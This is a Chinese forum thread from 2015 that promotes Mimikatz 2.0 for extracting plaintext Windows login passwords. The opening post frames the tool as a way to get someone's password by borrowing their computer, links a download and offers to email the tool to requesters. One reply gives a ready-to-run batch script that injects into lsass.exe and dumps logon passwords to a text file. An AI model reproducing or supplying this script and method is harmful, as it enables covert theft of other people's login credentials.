找回密码
 创建账号

QQ登录

只需一步,快速开始

查看: 10480|回复: 74

[其他发布] 利用Mimikatz 2.0 提取计算机开机密码

  [复制链接]
  • TA的每日心情

    2015-9-21 13:15
  • 签到天数: 129 天

    连续签到: 1 天

    [LV.7]雪女

    发表于 2015-1-19 14:13:14 | 显示全部楼层 |阅读模式

    马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。

    您需要 登录 才可以下载或查看,没有账号?创建账号

    ×
    本帖最后由 不再相信 于 2015-1-19 17:14 编辑

    只要借用一下电脑,便可轻松拿到密码……“女神,借用电脑一看可否?”


    大神们都知道的东西吧,渗透测试常用工具。一个法国牛人写的轻量级调试器,可以帮助安全测试人员抓取Windows密码。


    mimikatz 最近发布了它的2.0版本,抓密码命令更加简单了,估计作者也看到了对它这个神器最多的研究就是直接抓密码,

    为神马不发布一个直接一键版,哈哈哈哈哈。

    新功能还包括能够通过获取的kerberos登录凭据,绕过支持RestrictedAdmin模式的win8或win2012svr的远程终端(RDP)

    的登陆认证。建议默认禁止RestrictedAdmin模式登录。更多功能等着大家来发现


    神器的博客http://blog.gentilkiwi.com/mimikatz   

    直达下载地址https://github.com/gentilkiwi/mimikatz/releases/tag/2.0.0-alpha-20140614

    这个是电脑密码的截图,覆盖部分就是电脑密码,电脑win7 64位的。所以用x64神器

    2.0版本的只需要两条命令就可以了,比以前版本的更简单了。

    命令

    游客,如果您要查看本帖隐藏内容请回复


    我发现下载链接不能用了,我这边有一个,有需要的的朋友可以留下邮箱,我会发给你们的。

    评分

    参与人数 2贡献 +7 金钱 +35 收起 理由
    天下第七 + 5 + 15 很给力!
    Patriot + 2 + 20 很给力!

    查看全部评分

  • TA的每日心情
    开心
    2015-9-16 16:28
  • 签到天数: 17 天

    连续签到: 1 天

    [LV.4]提灯小僧

    发表于 2015-1-19 15:46:28 | 显示全部楼层
    哇,神器啊。好像有个PE下破密的工具
    回复

    使用道具 举报

  • TA的每日心情

    2017-10-9 08:38
  • 签到天数: 29 天

    连续签到: 1 天

    [LV.4]提灯小僧

    发表于 2015-1-19 15:54:14 | 显示全部楼层
    好厉害的样子
    回复

    使用道具 举报

  • TA的每日心情

    2015-9-21 13:15
  • 签到天数: 129 天

    连续签到: 1 天

    [LV.7]雪女

     楼主| 发表于 2015-1-19 15:55:56 | 显示全部楼层
    sndonge 发表于 2015-1-19 15:46
    哇,神器啊。好像有个PE下破密的工具

    这是桌面状态下的, 或者 服务器上使用的哟。。不是什么PE上的,PE的是不能够读取到密码的。。这个是明文密码
    回复

    使用道具 举报

  • TA的每日心情
    奋斗
    2017-11-22 07:59
  • 签到天数: 361 天

    连续签到: 1 天

    [LV.8]荒川之主

    发表于 2015-1-19 17:10:43 | 显示全部楼层
    谢谢分享~            
    回复

    使用道具 举报

  • TA的每日心情

    2017-7-15 13:58
  • 签到天数: 72 天

    连续签到: 1 天

    [LV.6]桃花妖

    发表于 2015-1-19 21:11:45 | 显示全部楼层
    果然是神器
    回复

    使用道具 举报

  • TA的每日心情
    开心
    2020-3-5 04:38
  • 签到天数: 214 天

    连续签到: 1 天

    [LV.7]雪女

    发表于 2015-1-19 22:33:29 | 显示全部楼层
    本帖最后由 secessionn 于 2015-1-21 23:02 编辑

    Useful tool! 在这里可以下载的啦:https://github.com/gentilkiwi/mimikatz/releases(见图),作者在此PDF文档里什么都说明了,关于这个东东:https://2014.rmll.info/slides/80 ... ecurity_service.pdf。另外再附上一个视频使用教程:(见附件)以及一个bat(<---省得自己输入命令了--->):
    @echo off

    cd %~dp0
    mimikatz.exe "privilege::debug" "inject::process lsass.exe mimilib.dll" "sekurlsa::logonpasswords" >>密码.txt
    pause

    本帖子中包含更多资源

    您需要 登录 才可以下载或查看,没有账号?创建账号

    ×
    回复

    使用道具 举报

  • TA的每日心情
    奋斗
    2023-8-26 16:22
  • 签到天数: 839 天

    连续签到: 1 天

    [LV.10]茨木童子

    发表于 2015-1-20 00:35:52 | 显示全部楼层
    win8.1机子上可以读取哇?
    回复

    使用道具 举报

  • TA的每日心情
    慵懒
    1 小时前
  • 签到天数: 3115 天

    连续签到: 56 天

    [LV.Master]酒吞童子

    发表于 2015-1-20 07:39:13 | 显示全部楼层
    要不要这么流弊
    回复

    使用道具 举报

  • TA的每日心情

    2015-9-21 13:15
  • 签到天数: 129 天

    连续签到: 1 天

    [LV.7]雪女

     楼主| 发表于 2015-1-20 09:08:19 | 显示全部楼层
    van 发表于 2015-1-20 00:35
    win8.1机子上可以读取哇?

    可以自测哟 亲,我没有装Win 8呢
    回复

    使用道具 举报

  • TA的每日心情

    2015-9-21 13:15
  • 签到天数: 129 天

    连续签到: 1 天

    [LV.7]雪女

     楼主| 发表于 2015-1-20 09:08:50 | 显示全部楼层

    已经发送给你了,你自己注意查收。
    回复

    使用道具 举报

  • TA的每日心情

    2015-9-21 13:15
  • 签到天数: 129 天

    连续签到: 1 天

    [LV.7]雪女

     楼主| 发表于 2015-1-20 15:58:47 | 显示全部楼层
    我该怎么办呢
    回复

    使用道具 举报

  • TA的每日心情
    奋斗
    2024-2-26 14:56
  • 签到天数: 33 天

    连续签到: 1 天

    [LV.5]三尾狐

    发表于 2015-1-21 11:19:50 | 显示全部楼层
    大半年前就有了..   不过确实是1神器...  
    回复

    使用道具 举报

  • TA的每日心情
    奋斗
    2023-8-26 16:22
  • 签到天数: 839 天

    连续签到: 1 天

    [LV.10]茨木童子

    发表于 2015-1-23 00:01:23 | 显示全部楼层
    不再相信 发表于 2015-1-20 09:08
    可以自测哟 亲,我没有装Win 8呢

    明早做测试,测试完了反馈~:)
    回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 创建账号

    本版积分规则

    Archiver|手机版|小黑屋|iYa.App 软件交流社区

    GMT+8, 2024-11-16 02:15 , Processed in 0.041335 second(s), 22 queries .

    Powered by Discuz! X3.5

    © 2001-2024 Discuz! Team.

    快速回复 返回顶部 返回列表